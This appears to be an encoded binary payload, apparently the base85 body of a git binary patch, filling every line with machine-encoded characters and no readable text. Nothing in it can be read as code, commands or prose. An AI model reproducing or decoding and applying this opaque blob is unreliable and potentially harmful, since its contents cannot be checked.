z4j-mq&69=qH)<?*nd<{&qR{?mI4o1WQ<ZOF`~`Abj5w<w7^~QmYQt?tedpDZ8Yvg|
zv%J8)|Ha$5Ie43V13NcjCl1$DMMIeqwp!Z(sd$?HQCP(;{KIY_!ca|3wzi5de1OG<
zmF~wtXtk`zd0T-$iG1&sJkTYIT)urHuY3Tz{5>6G<kl;&`g#Z#XDP{Y`ezG*k8&xe
ze>P9}D5rAz7jt2PWgd?7r0NVTb;~2#3uq=Hh1kYU+kvg=1?+(}BBTv1t7>1mncU6o
z9;AY)D+snuoNwXtjV#Qw2r@3~S<CFx<t1mi)yM)R#P)-#K*0|h86KbKKO5Ol@9vo8
zvK3}~TD{hs<zY+M=-w}(K=W#y;^7{~+hQ8YIG`nQp08NKq6(`)E9cdgA5%Y7>gSOB
zpl{5Vp`He94e=ogZH}x)YQ#9xxm=HW7xJRvAZD3`{i<z<x%Kwn!FmGwnOobS^#nD|
zjtJHiT@hYiH+6x{m!%+b3m@iV@KqM@IZNfXtZXT!Th2zlZz)^Gnr6Z>4E6xU89d=Z
z>}PT__<{%7{s=E{BQ%|%cF;t<TZ0?7c+LU(m`yKJ|60AG?&rgov0jBw(3r0i=YUX)
zvkT8w_#ybTK5PJXBD8!Uu8o!2P4Xnj6(>RM>Pb+RXqXLTsUKvSXs}9LM8Xunk&&x&
zR?yDc_5@Txk$S*QM5s0T7&P~wP`#0-tN9DNNP3xnx(rL8?>qd)GB&O20_5qQA-rev
zX%DgReCU}d-lZ3j4wCrwx}$&-bQSy1$kqvN6$j{RrdxLv$H@6PcuVt5m-Rl2t*Li=
zF1F~V9Rzrs4L9--QhZZE&#d>_k{TGWxws*ppMHo14W18P+x9P68S^PR^KvWbDSgRm
zZS`U%UjKpGlx`vKzMO?5?Y=>EvGt=f*wErzDpscOBP`sybIuT~w00<AoW!9SjX<2G
z(*j~#&PFK<dHHe{J7g+G0x{+LP(iwX0ved(0Br=wK&8byo6t$wy^<>{*u$)PBVW6M
z_3fcqDJjR2v`f+0x0DqHEaY#lfPT$F{`Cqr1)uPhEP|ao#?x1VJqVc27q4XDZnwaQ
z=tbZdzHKENHt`Hv=0>`wCo(CRWls8lw8Au*M{zm}!AGVTM(dkSLW!LB#LG(3?xDps
z$C4gEx08BUJrT^cs~BwP@U^ShY~=xdW)%xdS)vEaAZ-GRA=8PWu%@pAPthwOpr9v=
zSl$VJold^M_^%Q1cYs6ne7FgkGM)fgA0x5Wheh}|xLz-A&L9wJVUo`VADA}yL=&74
zJ6Rtib*yB~B8;Qn2|EwMLpkomVWRyA1&K-^=H|jONZFpf@WYH|*@oca!qzq#?jhDL
zD5kGDUQ^($PZnD#{TNXyqtFa5yrwbvTPKnQT2DfPwQ~anQdq6dT<<dp=@q<_C1%cm
zp&_;y&9b6^rDlZFpznJCMO<_V`syH}uv>(Qh<*F?<)*&o4NEnqU@?f`%a=mEzzrJM
zzgsBbIuVU%bVz7ufuG2tJ#OJ*?z$Si{Q@7lnvGEwbHi#Dp;&p@YVbno<M{E_;EmcQ
z@wU}0Zps?U`xVgk<8%z0fXJxmASBr94@ZJo27-xm?eOPTklQ(fU8%+1LR>0927mNn
z78ueWTLx<bbS`eqUWr>~Hvcl+Jj_20M(I7T@wXpl!&t9p`A-kCq3qCi+-D7FRMmHU
z#2OaNUfaoMtN~j#Y6&;2VS2X%-;r|4+w*z#8ulJr&-tT|pgMW{$Rpr)hdjqGJi?Nh
z<}eRh%M#hX?|AlFmK3`ukA@6Qo1GZBS@y%>D7V<$0o@3wHJJqbWu?&wib=+-t6$58
zbp2u}=#h)~VIgl@%kE{{`|$aXvfhD#eP~BO5)^l9DP3m6XooE<{YL)uqwHPgvVc!s
z$1>SHPxC$NSn{aePh+=W^fjbVyIy+<8C-yNA7q#=t9yxPt8@0_=|BWk<Apsm;q@K7
z`+C;9*E5ijV=`coZ6sspb~GCrHjGbL&nARn079f8UYeuU&*Wb3LTYk|Pe>o|m)Ela
z^N1oA;DPU@YM*5i(ayDcQKwmpOMqHY{Qx<)lQY-|=QvYEE0U&>BYFX98)jYKXf0?$
zn(s6tHkl4ly%l`m2BI1je8vXWcj``XO=NNu21~t5nh`UrY?W@Y#nqAs{>lDugyAK0
zAM6N!3*}j@Ap<LDmT1K;p^6|-Y{7A3*~AE_Z5#H&ocRXUFFfNOjpjy!^>d_SnRcyr
z^^G%qaGh}k%wC(TJ(1jwLe`sY{g#ImV)+Y6<J$|FUy^GY3JJ}V{NS<)It$*;n}H{d
zee?3A-b$wUH5I|u8NoPEAfbY_PAV;QwLcszPN&Kg*x^+EY9R~lJ_0Kq9heqhrfbzi
zjL#RcN8EPGQTTo?&n{x4r%~bSOH(imsNu7-F#qGR-Bh=Xp74E7C+~@^rtWr$Wv=xs
zzO@yRHhg709FJ(`I))0<z}}I=FBGvGEI*r{D`t!O|A?6^IqhxX#4f6*xcjy_3neg%
zs8IPESrFU$1b=iR8^`7z;Kw(jRdTZUg^gI|-S$*!&1|9K9)K*23SKTr<SR<pATJCI
z#{)xR;5fdoggwu4zU679EbPAPcOl=>0CbI|<b}Pcm9;b+9=-Tp1_Z+m-NT8xW`ZV5
zLYQVvO$>IfhVgb&Vz4*}WH<uEt1?z9aP5aSQF7v$yLf#m#H8(8_<u@SxW`74JJ8js
z+ATctF(~B~lZ3=}7S!UK@`ae0Sw`PHV*IK!sI$#Av2J}AYh49}7<GC<CJHL%!$Z@&
zAk?VKvcyrCi1}N9i!lhdP-4D(FB)~XcrtTMc-c%{@y&yn0PDMyQvx<YH&jGn&=?5n
zlSyY+gVO+a2v=a9no@i;866f$PVnnhln^b|*y+2;R1>eP>|5Nv9SJ@hWUU)qQ`72V
zu7=?D?jLb5Hr-QGgrQ(_r?(I3{Uf=%L3GIr`mXnvsNp~*)2zA0lO#Tr7je@ITAykR
zc>sb4YIZd%!;)og0mbt@?S*#xoh&CnvW9C!YRt`ev|tkp_4fY<@Wdu)N)$O;9~N(}
zZDI*ZAs@Dx_4hz>YOh!}^Zd<h5a3%jv%EX-zc%qdH?s$o4Sa!x1&==m;)BCBFZx!{
zKWhzkiO+24pm38mq4DUHMshb17`x!}N%ac#$+U(vE#n_rSU}+~AcQbEkPz2^G#vVj
z8aGf2!!aTtev`oRsJBa1g&lKiws)x!voGtP7~UnB02|IB8q^GY(BQNTj0H?@|H{xr
z;0nq_4I@~~ciMXZZ2TKgcYzR_I>Raie6;i%!YQyLfr?9jTcMHYM>=9a=#2-6@acl?
zn_J8eZejjI)Ew!86O4rYt6atiA#Y;6X+}aarEHpr!r0@)Mt*e*8y7^yL0|-cNGrsC
zMw;gID{tD!r&+N+Hf-dJtt`y<DLPUGFE43Uk%K%y`ZFn&tgTr}Ps{%Y<$sdTSV~E*
zBZ^n!U*tOSzXZRvlq5LRQt!Cq-dBoeO2K`4krysSMui*D$u1BXLFhC-q7de0fn&aD
zHwBt+wwrvdHRhkfFzRc5a@Bg4lKM}Fges!QyL2*;t<SVj@?UzFB*M3)M@+S)w1Kky
z*iuFkBunYX^8Y^k-~7xU^8X?HFF}k@_d=pZlt79_eo9YyZ~hmy(`DnEl5!sQ_CEfR
z_mQFi^ht;4ic(ur4KpFf;^P6g)>}RxkoAL0_+KM*YJTQcH}8_yk&wByi}$97;lRby
z+*cWCXO~gyVQI6J9=shw1ytLv8c;`@?iSL0jQ>2Hy`ePnCuT6;Q537RS}m<b=H_i#
zj&bZruX!QdOJv&aD7LxgjJC#7+Q=`=V4oLK2}$y%_E1^rcKBhH;v>B{5#?C!|0!^z
zHWH_>*jUS`eXsy+QO0d9C9p+8O3<Uz5dIHAos9Pc;E2)O1`ZB|;ZYeZw);UurA1Bc
z1uM$-U<Mn2>OGSIK~W?BI)e>$#T>3Lg?+1;?EZn&jd;%oB~<yNuzJ~4l!mS6mWgef
z<s*9ar44-NOcvjt1|Nl;ZEfBHZUAd`8G)MD!()v*h?HS7B9o+pcPR}#E|c|7_?Jl?
znKp>mtWw~3y*AwBve?qa#w=a#WY@eF2<A^yEV5@P$EPz{LLqgDEX|a}8eCPN_68)m
z0)^Nxx~ys*!m`CKtgu_;z_XO@LogN<aC$A44^F^ibFY_iD2h6StX&{^vXmAfQ0-;#
z`<BuYcpcqlKTHjYR<(y7rtBahrIgBK6x`X5+l!iZh&lra1)9Z<$hhfB7p`P*XSpYb
z+_NA0;Kx~PAR4FZY_<cwy|Y<tG9^%2UFd49@u)W?Tjk_>cBVc%L-fM|w7DkQvU@8~
zETvQm>wnBQ6E?VN%MOs|nMU3{3qrpJJ}is%8cO|H=NfJ6gDr-u+9Nno=rXw|9?N11
z6#4%eT&GT6^9NOYWfq%?m>*`bK0ZA_e5{h*U?kWNzr<UzpxNuk-LqMr?)7M9fXz~>
z473KG1R-rdDwMvgbT55GSwF`hDj1s}L8j4^Okp<bJ)i{ft+MpcQm~d$JgoaWY*Ao9
zR2pLIN60nVtfw-Cf1S<x_q&1qLY`JhVyv=X(XD>C;xv@l?p$;=56xkLg$`0v>IvzA
zRgxm$1%WD<{KP#gI@U6;wQ?=9F>6iH2fI)LdanV)q--bL<^{`dOU+*qfHMZ7$lKSx
zz<f6DW<E#o>$->eWaGCGzc=w~K^U<Cvpuhm=da{|YnywRf1bmRb-`7LlVCOYRx1na
zrg^PHVTIVfcdcxy_xJ^N`+GE^A>0tN7VvIcv7MT_gWt84Eew8PK2<H|Ld>a{FJtWX
zUyujHen!nq!z-`x<6Ch)Z8z|%TiN~CLfuow=J@}L2-a&5;e1^0dipd?TD?dZ#6K-#
zlSg3j#6#i&imEuxs4rV|nKZ#kyII_W4US{gfusu>7<9Av!2LXJ8}7|a7|1Q#AX3<Q
zfxos5CjnI#`A^#*nLl=syFbpxh3^7MHqOoz-{2M~4Cmsm+XlbH_Vxam&=c_#qc8I%
zk3;R`2NU1&I1W;G0()L9-RMAF$o!U6ySa?z(P2Zkoc3`J)j@9xrY#a7ogqHT4GJ;*
z0PZ<b47*<{>ST^2H*_74AT(3Tn>ylm#8njp1=?o3Js0b^9?>LzIjL=_nW?!rRS72n
zLoW`sODe3Qk~$Zm@@3muV2`OCNsvmHgg?6-htWC3{Oj%PB{rmuKl%jDMDV@%1bc-=
zwDB!Z;^4%m4c0JOp7J=K_Y})xDQ*0Nr<lEPDU?aRJ@xJF@4x-F`rDrxL*~K{t&2VM
zev)QYeWTYp0Bj$A@3Qb8h_jrCptzdVdm6n=gt&v+LNYK$rNZ+uu)Pa08PJO2I+!_g
zGJ&wAhSWh3QxH;^Yv`)eRErY`RSmloUyeYEP)8cdrK*yPkwG1)qQwlx+v_s@_Y?F#
z<P!alYoh<jjrhNKtDjp5eZ1PFFQh?!T+Yc)<Qe%HdK#ZykGp7qX-(5q6kdbhnx?C0
z#TRy8D|8f4+6cLDy-NyU3eNJ%DX^jqon7zJg8x+FdY5Z((e$Zz(MUWLT9>n=T2o)7
zgC9i9;a6{JS*E(QBD|(aW0fke<TsSG@uVFXoBemFRfWRV|9@5e-!-Kh3S<7iRS>1L
zY^FL=`2#qMWn-;;I*0f;k3YoONH;7xF(>twH2x!Je*8EG`Of1FoDB@TG7s~8T8sG+
zld{2&409TFG&ati<;Qoj06uaj>l66Gf8oG7yqnnQz$qb|Y5#>oT67{>;*9VjS%wDY
zg{Qfdw=U*wJ6Y&IKm(rrFVM_qp$4;NE?@U7q(~WO`0i)f{b4J*J2<8uL;=|5w6@Lj
zZr7!?V=Lw-)-K@vo`baf8$SCv%&5~F`Qhi-U=JLfU=n1L(o>~)j*VA5m*qRRLwyZ=
z)GiR|q<o&Yi_Hw5n@H!#xVrmp3Qc%$j8Mjwv)+7Jp3tA!#li#aIrNa-IXq$w`&Zdn
zB)+A#!?l2}yRqVq<NbHD<mr*6ooH#)ogEV0C-N+t)_|LR*j~7ag)+4UJakGIu<oQ5
zhby$$J0WF=*HZc0yP>PcOZcC=+3)DSi+k8;<$fOY0t*`){T&rH0t=@<$T;k@TUL4E
zV%Hoo3Sw#^=T3oxZV_Mj0@D{xo=eRLyHpqEI9uZJg+Q&d1>s>Km>M#56_LQfod_2Z
zERnI9#=!#Ajxs?Qh{B=+kfER0i6k5si|$4ma#LtcQK>3A99xM3FR@A@ffL8m<fW%v
z*F+?G;U>Yjy{zZF4cHhSPj%Con^LgFysHCIT)B^yJY?!)*h%uXZ@@1~c^h`<=Js|R
zzkh!ZSf2pl-Vw)n9cwd4l?KNc=lR=vS>OOQi+E(A6u6705z8E|u^DkUjwFZj-ivNG
z?iO6x%R;(8iC{X@hioHLV)FUk+OSa<=<L2$3{bP2bqA>niit{#F(@9jOI1q{qVnmm
z3xXxWRL+upkLKF#eWHcH$I(*H-^)*yL&s(V7v(I%cfN{Hb_XHlULO7;o7f#izn-e-
zio8okf(nZ+i};!s*-&?Y?Xe1unTq*aFG9MSQp`Vlk*z>_V=LG^Wewk5fy-Hw`RNL9
z_b{RV5*yYLC%TxYzQksC_E)^bR^sU=|Cd>$qT@*~vk5WCVRNc`td$xDbT*a66K!qo
zh5zbS-P+ph4v)1o>R%W+v_a(Wyv%AkC%gU?mgV)?td92FHj6jC!uEAWdGb|eLjgDJ
zW0O0B&+fzK1dmGZV>uzwSYT-fn+(cmJsghQV(iTm!J1`@o-_Hf*H~|Zqm@!jU5my9
zk^M7Uu+Yw=e1oYUPh`j*M=#lQgRfZYI&MCGu|}OAFw0d%L(IGch`3{4&|oQmQkI+9
z-j0*xQZ>4GJA+?&jRoL_i~D{S9F9yea06&mnU-gZ2WC6R5?(*oQFEm4XMMfm5!o@E
zZt8i#eik)hU6ve5ALEDv<51wDh7;pe3;^qS2>!n{s)H#5#&U5nIZOP6)NyE*n^+H9
z6Cde$(|#7(<73$}>YEtErL53%pVyf$jrXF3(Yo8X`eB{j)^VA`?n1{tS;y&=CriXX
z!0&z?BxUIoUiLaO1-^j83{^&y34&zH!PP}#{(hXygATBPerE@vv?n~pY@pR^22rz4
znZa`ouqniP(N$oRPeOrb!E=%>m|n(h#B!%hXKg_V&Ud|WGsYu3D^rYjBvpqwV(d$@
z!nN7_mjkRX_jv<~lX?8jH&|f&n5%aCQIbu_8=k|m#XtbyZa4MK79nt3Te54~T|^H!
z%}rssHBGKsdAG>^2J<hxd_^MLO^Dc}x@E+3a62NNg0pi(<b*9i?Us~?h{7aXB7OmN
z%oY`$65^c_vffFkh@1`PpHYUNUA4iu-{jiMC-?dUU6Cmtt01o87+ur_Vj_S2O*Wck
zJi#x$$)dZTmM35!+4*@fpUn{kt9ayFIQ7__&KJJLhA3D06K~<#buq7bi^aLCeces$
zzkA0)OzJ$IauBj$yx?_^CHkLEMiCm($f5OGC$}Hkg<n6&h6OvOPYbGp=NE|6&cel8
zdERgjPk9?c!f?L!Z5Hd_o`ghb%W(glErZ^bpLm-^DR1z9zs>s7lPk1yxVI6ln<?hd
z=kFVch0BqKDz>__fjBaO-~A3tMwu<|uq2eZ?j1JL|4^bMyVG~Fb9Ld}-i31Bzx(kK
z?=rs$vg{_5H2{y@(aFpSM+rhMII?c(*t_(9=znCrW<0mN%jS0pfSFvq$mA{WvLv^!
zZHTOgRpr=2EU9k;&3xJ}!9@0Y9EU)SuApnSs>flA$Pz!C<WC-AeT~4NJBhecpCv+|
z$%Z3sUqdTJ-sX(lXMH31Xx+;Q?6bZt<~oe+S_+yHr3Bl%>@oC!6ir)o2eA>I2XUO)
zl&#MaFPuaK=S50j@X*6-raN{M_Sl0I%GVxdA%!x3SntJcY(>0EdC+o0^nq@X{zl!K
z?wROv4iam6irJR|!<z1s=+fYTFcspP=+fwbv?vlMAkn4C0r^3N1Sh&&azIY2knqAp
z7vTWCuYw{HT`oHy`&3ALq6;2gklF80AxViYItQdgg`_09xH%vzRY+>0i>CuJUxiFc
zbn$UOrmK*ti5@P#4p5T9_a0%f3CO!Si1sFAMPWX1pm<KvjrN@dFkFz*Jc+_|VjG3v
z*sYDOr{Id`7aHzW$pZZVhDA*}X7GkN9}TT1<r<z?$wC6q)L>m;cCiL~kjoiH-)vH?
zPMyz}S2BMJ^=JW^Ggk-bjlHsgL81Qh`JPG^oDSa75en-LdS~dxJKzYtF~bS|^bR;m
zZw$hQp6=v{L-{+ZSYW`Nz(IQBEExx9_~v{*q6)>h6FNk1#4Bki20~}&^ZdWZ9i}(V
zbcROc^X-3+8?QI|WgD5y_Ie&aPI2=(s*s{L`pdXXFHYw1KPc{<&`Hh;B9!OxkoQ>N
zAcR7a<56cCh{2yJ7GTlN6py#J+i}vT7mrCtt6r>cZ|C#hV=2%YD97=y$FbY(cKfO|
z;?V7OKJa}uY^GyitpgmRSeNK>+5s`D5Vu5^GY&|O3W-j1X>~x-RY+{2OPd1{i*#Rm
zpGEt^-<%4*CFXj%QJ-ZgXcbwx{NL}hej~8<;{1Zf0~rGmM`1CDY>+l56SmzFpKz2^
z3cO1u!;fJ#C6|vo$|3^hc8nDr8ZpD@Eyv2}xqSUmG$leEqaj*v?B;Ar*SY*ngbo1X
zsy0?6<+uz@V4l_rtvPsFZ=uPiwPlDuZng8@kFwluPXS_ow*+Mnn*p1BjKzhcHWt@%
zY8ohIlv9JitZO+ngC#w>yzK$L{}?DoPl^dMs~+;}DYWv7ca#4^a9{DK{00aceMgB)
z(i<)s<u^i{liw(DT7HL!6Y?7^j>&JVI3&Np;(+|di<jg#N$kScd?LkOxH?5VAz`V)
zBEOSFvHVUIkH{}r7x|qf9+2N0u|R(3id^}fFEZqJp_nYc1~E>4mx=`WT`oq*uSpD)
z-!-C-{H_y$_!d$jjucVDc@S7tPSHr`W`h1jb_kDbCFgI_Nhj#yN9iOL6md>EN%cgW
zlFnV^JT9Gk$@#8yzC_M_(z%bEyQQ-V=NuaGq;wx6=O*c_Cg(coJVDMC()lqt7sDyb
z47r^~<j8<S<eVm*=g2u;IvdD2S~?raIYc^}$k|6aFTq(T{H0qE*h4zckW(X_m&y58
zE42Wz2;w*CyhhF+rL&cs=cKcZoTsD{Vi>f5bkfag@h+UQ%x>g+Sq6}Lk$A4PkkTg6
zjCfpveaTrOodM*0L^^}XxlB64$$6i2MvyZ{I-|%rO*)5=bG&p$lXJ9m#*%Z0bkb%;
z^pVaa1??~Vr8|Yd9@0rPKxp8Ug`Pydt2d~iQ_1<Obn403D4ny&c~&}e$XO?ybIEyB
zI_Hz~Ae`nC!K%an@>$wKe0YebRI~0%CZAc2>lBNClACM$(XxlAiOuCW=_^?`(SU;L
z5`U_ijV&CsAA|rp8<tI!YS~1c-Z&x?hKfP0Xr-yig7{$umZuEkNCFe=4Zu8F$|id1
zjWJHxvw)#?1oqJzW1ZlQ4pd*gG0q8F=73>A8<kn;Nb?>5vyG!Ok${@XWSO9z62#gz
z$QgO0BQh4Y!A@AH1BO*?h!f`SfMK~B>V#c~GNJi|OcDfgm<01PHB6U`0Lmy<ZyfGK
z{?q{r)*GXpuu2CE>sYE2Rxz7*{|K7^M-UdVbZ5{S2P{=@oalrtbilBjO>)BYfH}%F
zRd1Z^1SdF9^?KtJCoIwdo2572?SyqFSRsm^qc=`<0&im{>_~I2-Z;$({smyF>3qF$
zx)b)L1GZ3aoZ*BWcfbsKW4sf#|4x!i^~MAz_$i6XBWsy=p(B<_Z%lLsFLA)u=#5EE
zSoWQi*6EGOPH>8fx~T}`Q*XS>2_EPG(`uwQj&*{2IKV_z^~MyuFIYAm_O-<=2#wU5
zZz3wIH;!}0_z5AX{3fEfdgFK}_!9@1sIT5Q!3lmhlPf2f|KvN#(Y(<c2RacpI^yk>
z;4mk6i33aoT5k+@f@fv&`6nO@&E#uOu;2g(Qk6uK6V3?6#x;|_i97>lss*i<q3Rq%
zXv0k2h$PY-p+vr&(+Z)lI>1E7X=c$p0(iRvOf+4O3FZJlGLt8s#IcnllxVwiMj_H9
z2bk!*b5a33!U1lQV0B&r90ahV#c2s}PA!CJ91&<WaLz4&n={n<ozW~KxH`W8|Iz`c
zWx_ed06q$^BYj#m^u{!2Ey^7cXa#XjJVe;y0MlyXoO=MT%HZSb(4%*f(}3hTXB-g5
zJL1tI<D7H=4|afQwQ<fnfPFLgUL@C>L@Sc2Y@&6?IoW{lv!0&?LI4nG*wOk!Q;Zm3
zjMKw<ZvT7qaEYK!EJQES^XU3J(P>F?&MSmw>3JSPJLOKRlXEr!AyUsD2f}1W?zBod
zXAeSeK(s=IN|N9dXM?KhtwbU>rN|I<@*qOp4E{TkD|E!8Ma(%_5W3R=rUgxJjB+Md
z46vhZXnk`|9z?j`5rNh^y-}S!0P7uKTKAlj2jBz;c&@_DAG7XM2uc>lvZZ#O_~|Y%
z#%HYKmnOPMwNoF5((9DvWRztu0*h$ULpEJ24*y@c;|MoJS1TU>zp#4t2Aa!WN)fwa
z^W{{MzV<uC()H;OGl9#72(k1XoC1M$_qZE^CuS%@g)C|3#GxthDh_Xxc)7E;QS4B?
zq>l|NHDc2g{@y7zgLLuTKVhlLuYATQICD76i$8(j^%?%-C+zY5b6jXs&}b|yE0)7K
zLrj*COPwI2UHH?VvdF=qm%->uO=oj;5iGk%?@rW1dNuGm)SUma@k^hwDN(Q404it_
z<?`Doo|WHA;t70XF5u8&g1w+Ym~A}kG#fgwNvHFvm&xN`4=zesxWkohLXGg|Tbq<U
z*=AQBIE{KhM)SjGEZ8soBN9pArpAUrWu+Ld5T3NX!M#6ce(CLRINGzo8?niNTt3Kt
z=VOMUqg1^{l1*SgaR?D`ztb$V@&yP>Iv&4zgBw3*1G;v*3>#<Zo+6Py_c`>JQ{Ld8
ze$M)K9rn8l{*hn*oaz1Z===(MGiiy<au`BeyNHVCbH9L)cpESI0=f$0_}MSm;GSMk
zvrN%vm6`R_)3f!$?*R8c!wO+?{qZwwV$Yb@{}G<}I&VJ1LVO<wJwX+4dp+S%Pt#k_
z^}Mp52c5;y)0zD|@hs~d9unhJ)+EYy=Qu}ld7|4WzWOYRW8!<xvi?2Oz`><p^Z%H$
z9MksmZ_cvtq&;X$H6Q1hjB(_h#)9lEdof*j$}pG$bx@hv{2%HD2#Zn->jHVqm(UYA
z%Co;@!;-gtK)nFLxD<DvQBPw|<-xWN-7%3<AfQtr(GxhPGIrG)bF+k=fAl4;puIVR
zH-E|2us*T;zOUFw?M{Ck-}x0xmkAFYKm8SZkWJml6VI`s1Ik~e>cA>49q+#Zk7GX3
zVs1>yHo$l^u1ceg&*9MVUViW#?(q%dm(H=+s5!&`ceANh^~Bw%y|qE4j^rs{Lo%u_
z=8t^MrWAfTRc$8qxi)cd1iUTwBYTmb7=+75axCTct~M$uhL$TBERP*Tkg5iNrpUXl
z(G_SRT$e|8S=r(tBv5vcm<5c-X2{O|F&@tYM9ex3Q6$U9pJ!nnO@GQ!NU8Fr=UG4R
zKcm%RP&(qlm-(LaY(TfK|Dx>oIkM+poo8ueKkLqb%@%VIuWYA`rH|&Z-{6E66*Ydt
z?xt_$H@M!fyu{rb*c|fT-vD*m6&3us29`Hs_vB6uQGEIDL(kEMi-&b2KW7*p_^q0J
z{<qA;KAOb8{+2z^QyopltB%o>NTVs^I|y2lpXoaml}?Hfj<NK$I+i}~G?pL?i>Y3m
zxVZ#_(&S~XX69Dkm48T6N)82%3^ekKL-@t-puLYYyIf!cgTDnu&dtR&*sp-uaSCC+
zOyiPIy}*J(gNK0fda6x>`5+HbUx09e4jME=c*zA8>#-bpW>3-^Xmr+IU@0C;0muY^
zMrpT3re~9i`TRyUbC&Z;%{KG}S#g2AOH$6j>?yRS34E9(+BjRK4H(SV#OQa>xbrR}
zH%QL2C`c~%6ckKB$*76z_bemst~A*TbQBpr2Lj)#qaD&>2p*TLLoFfgHEQ!ZWWDP%
zNs7Dmd)7Z4Qe238Rn=X(yC?;~kn0N1@30Y+K6AuDO}gzx=fw+{Vj}~t?;;N};EF6}
zuIH`avp%5BK|ipWEFhUL`+-f)ejV!}bnUHWC;{#`+VNPG$QTdUT@ZreCQI@`$bmEk
z9$DfNDf^>)i5fpT4sJSgAj<vx1X(fb&vQDhnnjmb0UKhhym1M$**ywUSL;WET>$9w
z3wuRj(MEpiSGK)d1OmLbzDT9@0_=XlwnoMS7IQ%xM`071pP{fgf)y`nK^Y6RS0rjc
zGusjv4Y2iN*b(^Z7g`piJr$3Z@>nB3+RXZQ?@x=p^B_Sk<|x)`MV6|M(v>2kP^q#|
zuPTZx(-U3*JBu_)7O9L%LM2MV*I6Px+?`4UOq9qP0O<cH&{VZRzK7yF3RHZ#2sNWo
z{8uwe_FC1Qj>P-{68(et*xy)^Hny9#a>H*dPumlTntz*55_&I)qaSg9ziLV4AOB`X
zZE6w`HPmos7p>1r__gCV+)eAV9lxGkwLU}edmO(N_?^YC4!`H|18v8hWJdvZUt!0x
zc49`@CN4IwFTxAvP`=Vs7kEIUFWRt|0=yDGDu{%)k6|CYxJY62*NfjCqp^dl@ZO~#
zxM?(X6SOY2FvGz+2&W$7Z(YS9l#w@HWpkA!l?i_`*f8EOfCt`U6Isu$mG|CaJs3`$
z3vR<e-i*GLliJz6N|zLxAN&3I+jizp2a&jJo99+A0vBW5ab})N&rQPbr(UitOZU`^
z@b3I~J8p;o8COBH^-#+qeR|LgvDQz{0XM`Bob${GZO=h4ceN@9HyK-M>@MbC!fJkT
z#YHqap}wBl4OfYi%}L#0F_!H8KC?_4-nSYFS#=V@?CA=5uFYRcKOHBskYqk{P}^(P
ze#io`T8Q)bszJ8#rKi^PCoKhJ7}`k{S|06Ec5cYd#j10I(!vr)blwqNOwsb*iZ(0)
zCDYcRM(Q<QbX`Wd?}Ml)?u)vMSD-WvFV9o7A?#Q&U$1Cm(BN+?T7Pz;n4eO#{d)G;
zL(|o1av)H=cC($^6>V>=6^;<5O^oycKjbtwph&mF+`!wr)me`l%OCLdOgmIL&0oi-
z7Yfy(%6-S!KqLQyX@@DfJXEWV3Yt&-*sTZX99<xFoQ1=tPb=j1T5T^Jg0InPgJ&Tr
z9D-}*A^6H{L9cDei=;59LTBLAP+BxpRJOQDL1>AC=n_ea<O5Z7WOE5@Pk?v|f-xKg
zSKnyoLaQC(_XPZoZc5dlhETD1xH})H)5ecWMUZ+_-D(H(T-W>=#ynXw&&+<<OY~Pm
zo2>v^X9vJ;-<OLmiuW_sDG6ylu;}569A4CEm%Bf8UFJB&-p+$vw0RiHkGg1|4pEhr
z3SjxG^h+q2Z2F7JA!qj(99j%<)fV;9|AB1hxnb4lqP`vzB!0Qpf%YuU8a{K?zD*iP
zMP0OE-CXa4z1P;x-{_*<J#Y@}b~=*nhLeUWB9F}<P?6We5}WBqC@|84rq+M+Rc_i7
zgO*+GK<|SE(xcv%c0C=(hY2{k0<W2c=U;z<zIT?`!xwbbhJ|Fmi4nax7}_n1J+YdQ
z5)*C(7g47k_u#v`YI_a1a-}0llGtO(Y4E^wL$WC_BZ6o)Jah5na(<z!b|5>yywcTO
z`-?I{4qiL1K;j^tZbHz5ZBoC;sMX^t7%Grrr~(<W`^`s41x9y>r#7hDGPIbZx)94&
zrg>`33j6-w{1Y$jQdajXkME{^CVVdyZ<8y=99^pe%c`pRlwl79HJ|q{^M7~K2F#)v
z`Ka}Wnp-Z`cJr@cHNUz#lvFSfojN{~5Cs$3c2Aag2rJJW9UmHy@feU;6lbBVxQ}P+
zCZ=EJx!&5LqiongA)^39c8t7F(Q`EN+Od6;r>!K?%@%G~C`}kF)t5uh<CwQLDM208
z?hf6U7AX8*&lVAsxAhAu<xLkVD0m&riMrGTod$#6GfT|2@ew}SNLKu6WsZ-wQ7OE4
z0}*D`Fg1?6=^bg^uPBde0~*y~`U+&k5!Cz(1)ct1L7&T@OLu~re*{Es3~+huACCt;
zh9LQPP&e>k9j^yz&+-p@XnXaFq0k0&4pbTH)2>lT^y2F?GH`$k1^Ui)22zF)e4S}m
z?UN>-3)lH*s?LP-!9BHo-PVPYZ%ruqLJG5Cj^yThQ5aHmcU&n5%sRdX`lwkV50@3q
zbpg4s@&Nz3-}5knsrkW~!qArmmWv9y;tu1WbSSFyG`H&3doQUDaG|)6OCYY(=9f$x
z{YR-k(vkXAOlC^Gup@aqnC(b%{6zFv?LU(I3lVZ_oA2+Xni><k4`Jno$}BU`?jCA%
z3<L@XaB`;>W}u60Vj6JtWYuWJF$|#-p7rS@s?yjzMGQjBi`_Jqgmj&Fgpx|pVGj)c
z)Lk!p0+1Da)YB?U=1J;;**Meo7E=j%jhhJNulZ`nz&OAqUu{3-DemT{%?E8a_-RLX
zo%XJZ6UO)X0cSM-*-zV#J^c>v>Zi@-`Tp82?6c?j1Af|py|<*f#e9kOG+b_nDf;OF
z_30#J)6~088o&?uYm+8iLW7F$K$)^c+(|lzjUxz(@)OMGSg&LeCT45`VwpDtsLzcD
zh|0Y{H7^c8Lea<g;9lAwwtX+3*h?GI{WSzxw6ve~$bwSitoL|9FKwTkCr?n~s4*-+
zqnC|t!kr*MgV2bww7>|Xn`M%YuF+Hw00tTw@u@ZHs?x|<TX7*a5_nF$MZA9tt&6i0
zYh2@F{P$kkUQx49Mp-+bv8bIuC)%N=jM&!C<(u;5<gRFYj1LXa26_L1`PY%GOCiq+
z&?ZGqfW3A+vfU!)B6YEYP^g?xr4b3f=rH1~UFc2f_XD)Oy}I84U2f+W1GG^-jXeoV
z_9(7*Klc$23e*ON={6C6-or3$6u3JV@+smLX}DsXSD^T_1GOU~sh;8#3T>874a(6b
z=0Gms;EtgdgImN00=50`O{Z~+`?8=+SngzQNC^nuN1z#SPw?MEjlNX|YP*c}YTI2F
zTW%uN<d0E~_p0$v9zm^d5!I`(I!tqe(6@lc25BSuZO0qUWz(8O*$<fd2jy$qO|X=3
z3TOo_u(lBQ@h1LgkT!7ei`bdKK1<aLlus2rn7jp-W4^S^Zb_K!W9n7!x*VNTpB}Jq
